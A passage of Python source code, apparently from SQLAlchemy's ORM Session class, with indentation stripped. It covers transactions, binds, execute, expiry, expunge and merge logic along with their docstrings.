``Mapper`` will consult this dictionary for the direct ``Mapper``
instance as well as the mapper's ``mapped_table`` attribute in
order to locate an connectable to use. The full resolution is
described in the ``get_bind()`` method of ``Session``.
Usage looks like::
Session = sessionmaker(binds={
SomeMappedClass: create_engine('postgresql://engine1'),
somemapper: create_engine('postgresql://engine2'),
some_table: create_engine('postgresql://engine3'),
})
Also see the :meth:`.Session.bind_mapper`
and :meth:`.Session.bind_table` methods.
:param \class_: Specify an alternate class other than
``sqlalchemy.orm.session.Session`` which should be used by the
returned class. This is the only argument that is local to the
``sessionmaker()`` function, and is not sent directly to the
constructor for ``Session``.
:param _enable_transaction_accounting: Defaults to ``True``. A
legacy-only flag which when ``False`` disables *all* 0.5-style
object accounting on transaction boundaries, including auto-expiry
of instances on rollback and commit, maintenance of the "new" and
"deleted" lists upon rollback, and autoflush of pending changes upon
begin(), all of which are interdependent.
:param expire_on_commit: Defaults to ``True``. When ``True``, all
instances will be fully expired after each ``commit()``, so that
all attribute/object access subsequent to a completed transaction
will load from the most recent database state.
:param extension: An optional
:class:`~.SessionExtension` instance, or a list
of such instances, which will receive pre- and post- commit and
flush events, as well as a post-rollback event. **Deprecated.**
Please see :class:`.SessionEvents`.
:param info: optional dictionary of arbitrary data to be associated
with this :class:`.Session`. Is available via the :attr:`.Session.info`
attribute. Note the dictionary is copied at construction time so
that modifications to the per-:class:`.Session` dictionary will be local
to that :class:`.Session`.
.. versionadded:: 0.9.0
:param query_cls: Class which should be used to create new Query
objects, as returned by the ``query()`` method. Defaults to
:class:`~sqlalchemy.orm.query.Query`.
:param twophase: When ``True``, all transactions will be started as
a "two phase" transaction, i.e. using the "two phase" semantics
of the database in use along with an XID. During a ``commit()``,
after ``flush()`` has been issued for all attached databases, the
``prepare()`` method on each database's ``TwoPhaseTransaction``
will be called. This allows each database to roll back the entire
transaction, before each transaction is committed.
:param weak_identity_map: Defaults to ``True`` - when set to
``False``, objects placed in the :class:`.Session` will be
strongly referenced until explicitly removed or the
:class:`.Session` is closed. **Deprecated** - this option
is obsolete.
"""
if weak_identity_map:
self._identity_cls = identity.WeakInstanceDict
else:
util.warn_deprecated("weak_identity_map=False is deprecated. "
"This feature is not needed.")
self._identity_cls = identity.StrongInstanceDict
self.identity_map = self._identity_cls()
self._new = {} # InstanceState->object, strong refs object
self._deleted = {} # same
self.bind = bind
self.__binds = {}
self._flushing = False
self._warn_on_events = False
self.transaction = None
self.hash_key = _new_sessionid()
self.autoflush = autoflush
self.autocommit = autocommit
self.expire_on_commit = expire_on_commit
self._enable_transaction_accounting = _enable_transaction_accounting
self.twophase = twophase
self._query_cls = query_cls
if info:
self.info.update(info)
if extension:
for ext in util.to_list(extension):
SessionExtension._adapt_listener(self, ext)
if binds is not None:
for mapperortable, bind in binds.items():
insp = inspect(mapperortable)
if insp.is_selectable:
self.bind_table(mapperortable, bind)
elif insp.is_mapper:
self.bind_mapper(mapperortable, bind)
else:
assert False
if not self.autocommit:
self.begin()
_sessions[self.hash_key] = self
connection_callable = None
transaction = None
"""The current active or inactive :class:`.SessionTransaction`."""
@util.memoized_property
def info(self):
"""A user-modifiable dictionary.
The initial value of this dictioanry can be populated using the
``info`` argument to the :class:`.Session` constructor or
:class:`.sessionmaker` constructor or factory methods. The dictionary
here is always local to this :class:`.Session` and can be modified
independently of all other :class:`.Session` objects.
.. versionadded:: 0.9.0
"""
return {}
def begin(self, subtransactions=False, nested=False):
"""Begin a transaction on this Session.
If this Session is already within a transaction, either a plain
transaction or nested transaction, an error is raised, unless
``subtransactions=True`` or ``nested=True`` is specified.
The ``subtransactions=True`` flag indicates that this
:meth:`~.Session.begin` can create a subtransaction if a transaction
is already in progress. For documentation on subtransactions, please
see :ref:`session_subtransactions`.
The ``nested`` flag begins a SAVEPOINT transaction and is equivalent
to calling :meth:`~.Session.begin_nested`. For documentation on
SAVEPOINT transactions, please see :ref:`session_begin_nested`.
"""
if self.transaction is not None:
if subtransactions or nested:
self.transaction = self.transaction._begin(
nested=nested)
else:
raise sa_exc.InvalidRequestError(
"A transaction is already begun. Use "
"subtransactions=True to allow subtransactions.")
else:
self.transaction = SessionTransaction(
self, nested=nested)
return self.transaction # needed for __enter__/__exit__ hook
def begin_nested(self):
"""Begin a `nested` transaction on this Session.
The target database(s) must support SQL SAVEPOINTs or a
SQLAlchemy-supported vendor implementation of the idea.
For documentation on SAVEPOINT
transactions, please see :ref:`session_begin_nested`.
"""
return self.begin(nested=True)
def rollback(self):
"""Rollback the current transaction in progress.
If no transaction is in progress, this method is a pass-through.
This method rolls back the current transaction or nested transaction
regardless of subtransactions being in effect. All subtransactions up
to the first real transaction are closed. Subtransactions occur when
begin() is called multiple times.
.. seealso::
:ref:`session_rollback`
"""
if self.transaction is None:
pass
else:
self.transaction.rollback()
def commit(self):
"""Flush pending changes and commit the current transaction.
If no transaction is in progress, this method raises an
:exc:`~sqlalchemy.exc.InvalidRequestError`.
By default, the :class:`.Session` also expires all database
loaded state on all ORM-managed attributes after transaction commit.
This so that subsequent operations load the most recent
data from the database. This behavior can be disabled using
the ``expire_on_commit=False`` option to :class:`.sessionmaker` or
the :class:`.Session` constructor.
If a subtransaction is in effect (which occurs when begin() is called
multiple times), the subtransaction will be closed, and the next call
to ``commit()`` will operate on the enclosing transaction.
When using the :class:`.Session` in its default mode of
``autocommit=False``, a new transaction will
be begun immediately after the commit, but note that the newly begun
transaction does *not* use any connection resources until the first
SQL is actually emitted.
.. seealso::
:ref:`session_committing`
"""
if self.transaction is None:
if not self.autocommit:
self.begin()
else:
raise sa_exc.InvalidRequestError("No transaction is begun.")
self.transaction.commit()
def prepare(self):
"""Prepare the current transaction in progress for two phase commit.
If no transaction is in progress, this method raises an
:exc:`~sqlalchemy.exc.InvalidRequestError`.
Only root transactions of two phase sessions can be prepared. If the
current transaction is not such, an
:exc:`~sqlalchemy.exc.InvalidRequestError` is raised.
"""
if self.transaction is None:
if not self.autocommit:
self.begin()
else:
raise sa_exc.InvalidRequestError("No transaction is begun.")
self.transaction.prepare()
def connection(self, mapper=None, clause=None,
bind=None,
close_with_result=False,
**kw):
"""Return a :class:`.Connection` object corresponding to this
:class:`.Session` object's transactional state.
If this :class:`.Session` is configured with ``autocommit=False``,
either the :class:`.Connection` corresponding to the current
transaction is returned, or if no transaction is in progress, a new
one is begun and the :class:`.Connection` returned (note that no
transactional state is established with the DBAPI until the first
SQL statement is emitted).
Alternatively, if this :class:`.Session` is configured with
``autocommit=True``, an ad-hoc :class:`.Connection` is returned
using :meth:`.Engine.contextual_connect` on the underlying
:class:`.Engine`.
Ambiguity in multi-bind or unbound :class:`.Session` objects can be
resolved through any of the optional keyword arguments. This
ultimately makes usage of the :meth:`.get_bind` method for resolution.
:param bind:
Optional :class:`.Engine` to be used as the bind. If
this engine is already involved in an ongoing transaction,
that connection will be used. This argument takes precedence
over ``mapper``, ``clause``.
:param mapper:
Optional :func:`.mapper` mapped class, used to identify
the appropriate bind. This argument takes precedence over
``clause``.
:param clause:
A :class:`.ClauseElement` (i.e. :func:`~.sql.expression.select`,
:func:`~.sql.expression.text`,
etc.) which will be used to locate a bind, if a bind
cannot otherwise be identified.
:param close_with_result: Passed to :meth:`Engine.connect`, indicating
the :class:`.Connection` should be considered "single use",
automatically closing when the first result set is closed. This
flag only has an effect if this :class:`.Session` is configured with
``autocommit=True`` and does not already have a transaction
in progress.
:param \**kw:
Additional keyword arguments are sent to :meth:`get_bind()`,
allowing additional arguments to be passed to custom
implementations of :meth:`get_bind`.
"""
if bind is None:
bind = self.get_bind(mapper, clause=clause, **kw)
return self._connection_for_bind(bind,
close_with_result=close_with_result)
def _connection_for_bind(self, engine, **kwargs):
if self.transaction is not None:
return self.transaction._connection_for_bind(engine)
else:
return engine.contextual_connect(**kwargs)
def execute(self, clause, params=None, mapper=None, bind=None, **kw):
"""Execute a SQL expression construct or string statement within
the current transaction.
Returns a :class:`.ResultProxy` representing
results of the statement execution, in the same manner as that of an
:class:`.Engine` or
:class:`.Connection`.
E.g.::
result = session.execute(
user_table.select().where(user_table.c.id == 5)
)
:meth:`~.Session.execute` accepts any executable clause construct, such
as :func:`~.sql.expression.select`,
:func:`~.sql.expression.insert`,
:func:`~.sql.expression.update`,
:func:`~.sql.expression.delete`, and
:func:`~.sql.expression.text`. Plain SQL strings can be passed
as well, which in the case of :meth:`.Session.execute` only
will be interpreted the same as if it were passed via a
:func:`~.expression.text` construct. That is, the following usage::
result = session.execute(
"SELECT * FROM user WHERE id=:param",
{"param":5}
)
is equivalent to::
from sqlalchemy import text
result = session.execute(
text("SELECT * FROM user WHERE id=:param"),
{"param":5}
)
The second positional argument to :meth:`.Session.execute` is an
optional parameter set. Similar to that of
:meth:`.Connection.execute`, whether this is passed as a single
dictionary, or a list of dictionaries, determines whether the DBAPI
cursor's ``execute()`` or ``executemany()`` is used to execute the
statement. An INSERT construct may be invoked for a single row::
result = session.execute(users.insert(), {"id": 7, "name": "somename"})
or for multiple rows::
result = session.execute(users.insert(), [
{"id": 7, "name": "somename7"},
{"id": 8, "name": "somename8"},
{"id": 9, "name": "somename9"}
])
The statement is executed within the current transactional context of
this :class:`.Session`. The :class:`.Connection` which is used
to execute the statement can also be acquired directly by
calling the :meth:`.Session.connection` method. Both methods use
a rule-based resolution scheme in order to determine the
:class:`.Connection`, which in the average case is derived directly
from the "bind" of the :class:`.Session` itself, and in other cases
can be based on the :func:`.mapper`
and :class:`.Table` objects passed to the method; see the documentation
for :meth:`.Session.get_bind` for a full description of this scheme.
The :meth:`.Session.execute` method does *not* invoke autoflush.
The :class:`.ResultProxy` returned by the :meth:`.Session.execute`
method is returned with the "close_with_result" flag set to true;
the significance of this flag is that if this :class:`.Session` is
autocommitting and does not have a transaction-dedicated
:class:`.Connection` available, a temporary :class:`.Connection` is
established for the statement execution, which is closed (meaning,
returned to the connection pool) when the :class:`.ResultProxy` has
consumed all available data. This applies *only* when the
:class:`.Session` is configured with autocommit=True and no
transaction has been started.
:param clause:
An executable statement (i.e. an :class:`.Executable` expression
such as :func:`.expression.select`) or string SQL statement
to be executed.
:param params:
Optional dictionary, or list of dictionaries, containing
bound parameter values. If a single dictionary, single-row
execution occurs; if a list of dictionaries, an
"executemany" will be invoked. The keys in each dictionary
must correspond to parameter names present in the statement.
:param mapper:
Optional :func:`.mapper` or mapped class, used to identify
the appropriate bind. This argument takes precedence over
``clause`` when locating a bind. See :meth:`.Session.get_bind`
for more details.
:param bind:
Optional :class:`.Engine` to be used as the bind. If
this engine is already involved in an ongoing transaction,
that connection will be used. This argument takes
precedence over ``mapper`` and ``clause`` when locating
a bind.
:param \**kw:
Additional keyword arguments are sent to :meth:`.Session.get_bind()`
to allow extensibility of "bind" schemes.
.. seealso::
:ref:`sqlexpression_toplevel` - Tutorial on using Core SQL
constructs.
:ref:`connections_toplevel` - Further information on direct
statement execution.
:meth:`.Connection.execute` - core level statement execution
method, which is :meth:`.Session.execute` ultimately uses
in order to execute the statement.
"""
clause = expression._literal_as_text(clause)
if bind is None:
bind = self.get_bind(mapper, clause=clause, **kw)
return self._connection_for_bind(bind, close_with_result=True).execute(
clause, params or {})
def scalar(self, clause, params=None, mapper=None, bind=None, **kw):
"""Like :meth:`~.Session.execute` but return a scalar result."""
return self.execute(
clause, params=params, mapper=mapper, bind=bind, **kw).scalar()
def close(self):
"""Close this Session.
This clears all items and ends any transaction in progress.
If this session were created with ``autocommit=False``, a new
transaction is immediately begun. Note that this new transaction does
not use any connection resources until they are first needed.
"""
self.expunge_all()
if self.transaction is not None:
for transaction in self.transaction._iterate_parents():
transaction.close()
def expunge_all(self):
"""Remove all object instances from this ``Session``.
This is equivalent to calling ``expunge(obj)`` on all objects in this
``Session``.
"""
for state in self.identity_map.all_states() + list(self._new):
state._detach()
self.identity_map = self._identity_cls()
self._new = {}
self._deleted = {}
# TODO: need much more test coverage for bind_mapper() and similar !
# TODO: + crystalize + document resolution order
# vis. bind_mapper/bind_table
def bind_mapper(self, mapper, bind):
"""Bind operations for a mapper to a Connectable.
mapper
A mapper instance or mapped class
bind
Any Connectable: a ``Engine`` or ``Connection``.
All subsequent operations involving this mapper will use the given
`bind`.
"""
if isinstance(mapper, type):
mapper = class_mapper(mapper)
self.__binds[mapper.base_mapper] = bind
for t in mapper._all_tables:
self.__binds[t] = bind
def bind_table(self, table, bind):
"""Bind operations on a Table to a Connectable.
table
A ``Table`` instance
bind
Any Connectable: a ``Engine`` or ``Connection``.
All subsequent operations involving this ``Table`` will use the
given `bind`.
"""
self.__binds[table] = bind
def get_bind(self, mapper=None, clause=None):
"""Return a "bind" to which this :class:`.Session` is bound.
The "bind" is usually an instance of :class:`.Engine`,
except in the case where the :class:`.Session` has been
explicitly bound directly to a :class:`.Connection`.
For a multiply-bound or unbound :class:`.Session`, the
``mapper`` or ``clause`` arguments are used to determine the
appropriate bind to return.
Note that the "mapper" argument is usually present
when :meth:`.Session.get_bind` is called via an ORM
operation such as a :meth:`.Session.query`, each
individual INSERT/UPDATE/DELETE operation within a
:meth:`.Session.flush`, call, etc.
The order of resolution is:
1. if mapper given and session.binds is present,
locate a bind based on mapper.
2. if clause given and session.binds is present,
locate a bind based on :class:`.Table` objects
found in the given clause present in session.binds.
3. if session.bind is present, return that.
4. if clause given, attempt to return a bind
linked to the :class:`.MetaData` ultimately
associated with the clause.
5. if mapper given, attempt to return a bind
linked to the :class:`.MetaData` ultimately
associated with the :class:`.Table` or other
selectable to which the mapper is mapped.
6. No bind can be found, :exc:`~sqlalchemy.exc.UnboundExecutionError`
is raised.
:param mapper:
Optional :func:`.mapper` mapped class or instance of
:class:`.Mapper`. The bind can be derived from a :class:`.Mapper`
first by consulting the "binds" map associated with this
:class:`.Session`, and secondly by consulting the :class:`.MetaData`
associated with the :class:`.Table` to which the :class:`.Mapper`
is mapped for a bind.
:param clause:
A :class:`.ClauseElement` (i.e. :func:`~.sql.expression.select`,
:func:`~.sql.expression.text`,
etc.). If the ``mapper`` argument is not present or could not
produce a bind, the given expression construct will be searched
for a bound element, typically a :class:`.Table` associated with
bound :class:`.MetaData`.
"""
if mapper is clause is None:
if self.bind:
return self.bind
else:
raise sa_exc.UnboundExecutionError(
"This session is not bound to a single Engine or "
"Connection, and no context was provided to locate "
"a binding.")
c_mapper = mapper is not None and _class_to_mapper(mapper) or None
# manually bound?
if self.__binds:
if c_mapper:
if c_mapper.base_mapper in self.__binds:
return self.__binds[c_mapper.base_mapper]
elif c_mapper.mapped_table in self.__binds:
return self.__binds[c_mapper.mapped_table]
if clause is not None:
for t in sql_util.find_tables(clause, include_crud=True):
if t in self.__binds:
return self.__binds[t]
if self.bind:
return self.bind
if isinstance(clause, sql.expression.ClauseElement) and clause.bind:
return clause.bind
if c_mapper and c_mapper.mapped_table.bind:
return c_mapper.mapped_table.bind
context = []
if mapper is not None:
context.append('mapper %s' % c_mapper)
if clause is not None:
context.append('SQL expression')
raise sa_exc.UnboundExecutionError(
"Could not locate a bind configured on %s or this Session" % (
', '.join(context)))
def query(self, *entities, **kwargs):
"""Return a new ``Query`` object corresponding to this ``Session``."""
return self._query_cls(entities, self, **kwargs)
@property
@util.contextmanager
def no_autoflush(self):
"""Return a context manager that disables autoflush.
e.g.::
with session.no_autoflush:
some_object = SomeClass()
session.add(some_object)
# won't autoflush
some_object.related_thing = session.query(SomeRelated).first()
Operations that proceed within the ``with:`` block
will not be subject to flushes occurring upon query
access. This is useful when initializing a series
of objects which involve existing database queries,
where the uncompleted object should not yet be flushed.
.. versionadded:: 0.7.6
"""
autoflush = self.autoflush
self.autoflush = False
yield self
self.autoflush = autoflush
def _autoflush(self):
if self.autoflush and not self._flushing:
self.flush()
def refresh(self, instance, attribute_names=None, lockmode=None):
"""Expire and refresh the attributes on the given instance.
A query will be issued to the database and all attributes will be
refreshed with their current database value.
Lazy-loaded relational attributes will remain lazily loaded, so that
the instance-wide refresh operation will be followed immediately by
the lazy load of that attribute.
Eagerly-loaded relational attributes will eagerly load within the
single refresh operation.
Note that a highly isolated transaction will return the same values as
were previously read in that same transaction, regardless of changes
in database state outside of that transaction - usage of
:meth:`~Session.refresh` usually only makes sense if non-ORM SQL
statement were emitted in the ongoing transaction, or if autocommit
mode is turned on.
:param attribute_names: optional. An iterable collection of
string attribute names indicating a subset of attributes to
be refreshed.
:param lockmode: Passed to the :class:`~sqlalchemy.orm.query.Query`
as used by :meth:`~sqlalchemy.orm.query.Query.with_lockmode`.
"""
try:
state = attributes.instance_state(instance)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
self._expire_state(state, attribute_names)
if loading.load_on_ident(
self.query(object_mapper(instance)),
state.key, refresh_state=state,
lockmode=lockmode,
only_load_props=attribute_names) is None:
raise sa_exc.InvalidRequestError(
"Could not refresh instance '%s'" %
instance_str(instance))
def expire_all(self):
"""Expires all persistent instances within this Session.
When any attributes on a persistent instance is next accessed,
a query will be issued using the
:class:`.Session` object's current transactional context in order to
load all expired attributes for the given instance. Note that
a highly isolated transaction will return the same values as were
previously read in that same transaction, regardless of changes
in database state outside of that transaction.
To expire individual objects and individual attributes
on those objects, use :meth:`Session.expire`.
The :class:`.Session` object's default behavior is to
expire all state whenever the :meth:`Session.rollback`
or :meth:`Session.commit` methods are called, so that new
state can be loaded for the new transaction. For this reason,
calling :meth:`Session.expire_all` should not be needed when
autocommit is ``False``, assuming the transaction is isolated.
"""
for state in self.identity_map.all_states():
state._expire(state.dict, self.identity_map._modified)
def expire(self, instance, attribute_names=None):
"""Expire the attributes on an instance.
Marks the attributes of an instance as out of date. When an expired
attribute is next accessed, a query will be issued to the
:class:`.Session` object's current transactional context in order to
load all expired attributes for the given instance. Note that
a highly isolated transaction will return the same values as were
previously read in that same transaction, regardless of changes
in database state outside of that transaction.
To expire all objects in the :class:`.Session` simultaneously,
use :meth:`Session.expire_all`.
The :class:`.Session` object's default behavior is to
expire all state whenever the :meth:`Session.rollback`
or :meth:`Session.commit` methods are called, so that new
state can be loaded for the new transaction. For this reason,
calling :meth:`Session.expire` only makes sense for the specific
case that a non-ORM SQL statement was emitted in the current
transaction.
:param instance: The instance to be refreshed.
:param attribute_names: optional list of string attribute names
indicating a subset of attributes to be expired.
"""
try:
state = attributes.instance_state(instance)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
self._expire_state(state, attribute_names)
def _expire_state(self, state, attribute_names):
self._validate_persistent(state)
if attribute_names:
state._expire_attributes(state.dict, attribute_names)
else:
# pre-fetch the full cascade since the expire is going to
# remove associations
cascaded = list(state.manager.mapper.cascade_iterator(
'refresh-expire', state))
self._conditional_expire(state)
for o, m, st_, dct_ in cascaded:
self._conditional_expire(st_)
def _conditional_expire(self, state):
"""Expire a state if persistent, else expunge if pending"""
if state.key:
state._expire(state.dict, self.identity_map._modified)
elif state in self._new:
self._new.pop(state)
state._detach()
@util.deprecated("0.7", "The non-weak-referencing identity map "
"feature is no longer needed.")
def prune(self):
"""Remove unreferenced instances cached in the identity map.
Note that this method is only meaningful if "weak_identity_map" is set
to False. The default weak identity map is self-pruning.
Removes any object in this Session's identity map that is not
referenced in user code, modified, new or scheduled for deletion.
Returns the number of objects pruned.
"""
return self.identity_map.prune()
def expunge(self, instance):
"""Remove the `instance` from this ``Session``.
This will free all internal references to the instance. Cascading
will be applied according to the *expunge* cascade rule.
"""
try:
state = attributes.instance_state(instance)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
if state.session_id is not self.hash_key:
raise sa_exc.InvalidRequestError(
"Instance %s is not present in this Session" %
state_str(state))
cascaded = list(state.manager.mapper.cascade_iterator(
'expunge', state))
self._expunge_state(state)
for o, m, st_, dct_ in cascaded:
self._expunge_state(st_)
def _expunge_state(self, state):
if state in self._new:
self._new.pop(state)
state._detach()
elif self.identity_map.contains_state(state):
self.identity_map.discard(state)
self._deleted.pop(state, None)
state._detach()
elif self.transaction:
self.transaction._deleted.pop(state, None)
def _register_newly_persistent(self, states):
for state in states:
mapper = _state_mapper(state)
# prevent against last minute dereferences of the object
obj = state.obj()
if obj is not None:
instance_key = mapper._identity_key_from_state(state)
if _none_set.issubset(instance_key[1]) and \
not mapper.allow_partial_pks or \
_none_set.issuperset(instance_key[1]):
raise exc.FlushError(
"Instance %s has a NULL identity key. If this is an "
"auto-generated value, check that the database table "
"allows generation of new primary key values, and "
"that the mapped Column object is configured to "
"expect these generated values. Ensure also that "
"this flush() is not occurring at an inappropriate "
"time, such aswithin a load() event."
% state_str(state)
)
if state.key is None:
state.key = instance_key
elif state.key != instance_key:
# primary key switch. use discard() in case another
# state has already replaced this one in the identity
# map (see test/orm/test_naturalpks.py ReversePKsTest)
self.identity_map.discard(state)
if state in self.transaction._key_switches:
orig_key = self.transaction._key_switches[state][0]
else:
orig_key = state.key
self.transaction._key_switches[state] = (
orig_key, instance_key)
state.key = instance_key
self.identity_map.replace(state)
statelib.InstanceState._commit_all_states(
((state, state.dict) for state in states),
self.identity_map
)
self._register_altered(states)
# remove from new last, might be the last strong ref
for state in set(states).intersection(self._new):
self._new.pop(state)
def _register_altered(self, states):
if self._enable_transaction_accounting and self.transaction:
for state in states:
if state in self._new:
self.transaction._new[state] = True
else:
self.transaction._dirty[state] = True
def _remove_newly_deleted(self, states):
for state in states:
if self._enable_transaction_accounting and self.transaction:
self.transaction._deleted[state] = True
self.identity_map.discard(state)
self._deleted.pop(state, None)
state.deleted = True
def add(self, instance, _warn=True):
"""Place an object in the ``Session``.
Its state will be persisted to the database on the next flush
operation.
Repeated calls to ``add()`` will be ignored. The opposite of ``add()``
is ``expunge()``.
"""
if _warn and self._warn_on_events:
self._flush_warning("Session.add()")
try:
state = attributes.instance_state(instance)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
self._save_or_update_state(state)
def add_all(self, instances):
"""Add the given collection of instances to this ``Session``."""
if self._warn_on_events:
self._flush_warning("Session.add_all()")
for instance in instances:
self.add(instance, _warn=False)
def _save_or_update_state(self, state):
self._save_or_update_impl(state)
mapper = _state_mapper(state)
for o, m, st_, dct_ in mapper.cascade_iterator(
'save-update',
state,
halt_on=self._contains_state):
self._save_or_update_impl(st_)
def delete(self, instance):
"""Mark an instance as deleted.
The database delete operation occurs upon ``flush()``.
"""
if self._warn_on_events:
self._flush_warning("Session.delete()")
try:
state = attributes.instance_state(instance)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
if state.key is None:
raise sa_exc.InvalidRequestError(
"Instance '%s' is not persisted" %
state_str(state))
if state in self._deleted:
return
# ensure object is attached to allow the
# cascade operation to load deferred attributes
# and collections
self._attach(state, include_before=True)
# grab the cascades before adding the item to the deleted list
# so that autoflush does not delete the item
# the strong reference to the instance itself is significant here
cascade_states = list(state.manager.mapper.cascade_iterator(
'delete', state))
self._deleted[state] = state.obj()
self.identity_map.add(state)
for o, m, st_, dct_ in cascade_states:
self._delete_impl(st_)
def merge(self, instance, load=True):
"""Copy the state of a given instance into a corresponding instance
within this :class:`.Session`.
:meth:`.Session.merge` examines the primary key attributes of the
source instance, and attempts to reconcile it with an instance of the
same primary key in the session. If not found locally, it attempts
to load the object from the database based on primary key, and if
none can be located, creates a new instance. The state of each
attribute on the source instance is then copied to the target instance.
The resulting target instance is then returned by the method; the
original source instance is left unmodified, and un-associated with the
:class:`.Session` if not already.
This operation cascades to associated instances if the association is
mapped with ``cascade="merge"``.
See :ref:`unitofwork_merging` for a detailed discussion of merging.
:param instance: Instance to be merged.
:param load: Boolean, when False, :meth:`.merge` switches into
a "high performance" mode which causes it to forego emitting history
events as well as all database access. This flag is used for
cases such as transferring graphs of objects into a :class:`.Session`
from a second level cache, or to transfer just-loaded objects
into the :class:`.Session` owned by a worker thread or process
without re-querying the database.
The ``load=False`` use case adds the caveat that the given
object has to be in a "clean" state, that is, has no pending changes
to be flushed - even if the incoming object is detached from any
:class:`.Session`. This is so that when
the merge operation populates local attributes and
cascades to related objects and
collections, the values can be "stamped" onto the
target object as is, without generating any history or attribute
events, and without the need to reconcile the incoming data with
any existing related objects or collections that might not
be loaded. The resulting objects from ``load=False`` are always
produced as "clean", so it is only appropriate that the given objects
should be "clean" as well, else this suggests a mis-use of the method.
"""
if self._warn_on_events:
self._flush_warning("Session.merge()")
_recursive = {}
if load:
# flush current contents if we expect to load data
self._autoflush()
object_mapper(instance) # verify mapped
autoflush = self.autoflush
try:
self.autoflush = False
return self._merge(
attributes.instance_state(instance),
attributes.instance_dict(instance),
load=load, _recursive=_recursive)
finally:
self.autoflush = autoflush
def _merge(self, state, state_dict, load=True, _recursive=None):
mapper = _state_mapper(state)
if state in _recursive:
return _recursive[state]
new_instance = False
key = state.key
if key is None:
if not load:
raise sa_exc.InvalidRequestError(
"merge() with load=False option does not support "
"objects transient (i.e. unpersisted) objects. flush() "
"all changes on mapped instances before merging with "
"load=False.")
key = mapper._identity_key_from_state(state)
if key in self.identity_map:
merged = self.identity_map[key]
elif not load:
if state.modified:
raise sa_exc.InvalidRequestError(
"merge() with load=False option does not support "
"objects marked as 'dirty'. flush() all changes on "
"mapped instances before merging with load=False.")
merged = mapper.class_manager.new_instance()
merged_state = attributes.instance_state(merged)
merged_state.key = key
self._update_impl(merged_state)
new_instance = True
elif not _none_set.issubset(key[1]) or \
(mapper.allow_partial_pks and
not _none_set.issuperset(key[1])):
merged = self.query(mapper.class_).get(key[1])
else:
merged = None
if merged is None:
merged = mapper.class_manager.new_instance()
merged_state = attributes.instance_state(merged)
merged_dict = attributes.instance_dict(merged)
new_instance = True
self._save_or_update_state(merged_state)
else:
merged_state = attributes.instance_state(merged)
merged_dict = attributes.instance_dict(merged)
_recursive[state] = merged
# check that we didn't just pull the exact same
# state out.
if state is not merged_state:
# version check if applicable
if mapper.version_id_col is not None:
existing_version = mapper._get_state_attr_by_column(
state,
state_dict,
mapper.version_id_col,
passive=attributes.PASSIVE_NO_INITIALIZE)
merged_version = mapper._get_state_attr_by_column(
merged_state,
merged_dict,
mapper.version_id_col,
passive=attributes.PASSIVE_NO_INITIALIZE)
if existing_version is not attributes.PASSIVE_NO_RESULT and \
merged_version is not attributes.PASSIVE_NO_RESULT and \
existing_version != merged_version:
raise exc.StaleDataError(
"Version id '%s' on merged state %s "
"does not match existing version '%s'. "
"Leave the version attribute unset when "
"merging to update the most recent version."
% (
existing_version,
state_str(merged_state),
merged_version
))
merged_state.load_path = state.load_path
merged_state.load_options = state.load_options
for prop in mapper.iterate_properties:
prop.merge(self, state, state_dict,
merged_state, merged_dict,
load, _recursive)
if not load:
# remove any history
merged_state._commit_all(merged_dict, self.identity_map)
if new_instance:
merged_state.manager.dispatch.load(merged_state, None)
return merged
def _validate_persistent(self, state):
if not self.identity_map.contains_state(state):
raise sa_exc.InvalidRequestError(
"Instance '%s' is not persistent within this Session" %
state_str(state))
def _save_impl(self, state):
if state.key is not None:
raise sa_exc.InvalidRequestError(
"Object '%s' already has an identity - it can't be registered "
"as pending" % state_str(state))
self._before_attach(state)
if state not in self._new:
self._new[state] = state.obj()
state.insert_order = len(self._new)
self._attach(state)
def _update_impl(self, state, discard_existing=False):
if (self.identity_map.contains_state(state) and
state not in self._deleted):
return
if state.key is None:
raise sa_exc.InvalidRequestError(
"Instance '%s' is not persisted" %
state_str(state))
if state.deleted:
raise sa_exc.InvalidRequestError(
"Instance '%s' has been deleted. Use the make_transient() "
"function to send this object back to the transient state." %
state_str(state)
)
self._before_attach(state)
self._deleted.pop(state, None)
if discard_existing:
self.identity_map.replace(state)
else:
self.identity_map.add(state)
self._attach(state)
def _save_or_update_impl(self, state):
if state.key is None:
self._save_impl(state)
else:
self._update_impl(state)
def _delete_impl(self, state):
if state in self._deleted:
return
if state.key is None:
return
self._attach(state, include_before=True)
self._deleted[state] = state.obj()
self.identity_map.add(state)
def enable_relationship_loading(self, obj):
"""Associate an object with this :class:`.Session` for related
object loading.
.. warning::
:meth:`.enable_relationship_loading` exists to serve special
use cases and is not recommended for general use.
Accesses of attributes mapped with :func:`.relationship`
will attempt to load a value from the database using this
:class:`.Session` as the source of connectivity. The values
will be loaded based on foreign key values present on this
object - it follows that this functionality
generally only works for many-to-one-relationships.
The object will be attached to this session, but will
**not** participate in any persistence operations; its state
for almost all purposes will remain either "transient" or
"detached", except for the case of relationship loading.
Also note that backrefs will often not work as expected.
Altering a relationship-bound attribute on the target object
may not fire off a backref event, if the effective value
is what was already loaded from a foreign-key-holding value.
The :meth:`.Session.enable_relationship_loading` method supersedes
the ``load_on_pending`` flag on :func:`.relationship`. Unlike
that flag, :meth:`.Session.enable_relationship_loading` allows
an object to remain transient while still being able to load
related items.
To make a transient object associated with a :class:`.Session`
via :meth:`.Session.enable_relationship_loading` pending, add
it to the :class:`.Session` using :meth:`.Session.add` normally.
:meth:`.Session.enable_relationship_loading` does not improve
behavior when the ORM is used normally - object references should be
constructed at the object level, not at the foreign key level, so
that they are present in an ordinary way before flush()
proceeds. This method is not intended for general use.
.. versionadded:: 0.8
"""
state = attributes.instance_state(obj)
self._attach(state, include_before=True)
state._load_pending = True
def _before_attach(self, state):
if state.session_id != self.hash_key and \
self.dispatch.before_attach:
self.dispatch.before_attach(self, state.obj())
def _attach(self, state, include_before=False):
if state.key and \
state.key in self.identity_map and \
not self.identity_map.contains_state(state):
raise sa_exc.InvalidRequestError("Can't attach instance "
"%s; another instance with key %s is already "
"present in this session."
% (state_str(state), state.key))
if state.session_id and \
state.session_id is not self.hash_key and \
state.session_id in _sessions:
raise sa_exc.InvalidRequestError(
"Object '%s' is already attached to session '%s' "
"(this is '%s')" % (state_str(state),
state.session_id, self.hash_key))
if state.session_id != self.hash_key:
if include_before and \
self.dispatch.before_attach:
self.dispatch.before_attach(self, state.obj())
state.session_id = self.hash_key
if state.modified and state._strong_obj is None:
state._strong_obj = state.obj()
